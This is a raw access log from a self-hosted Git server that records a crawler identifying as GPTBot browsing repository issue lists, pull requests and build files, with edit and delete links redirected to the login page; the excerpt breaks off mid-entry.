"/windpacer/homepage/pulls?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10086] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:19:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?state=closed&type=all" [Client 74.7.227.38] [Length 10109] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:19:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14950] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:19:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11794] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:19:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11070] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:19:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11181] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:19:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11179] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:19:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12217] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode" -[17/Feb/2026:19:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11558] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12240] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:29:28 +0000] - 200 200 - GET 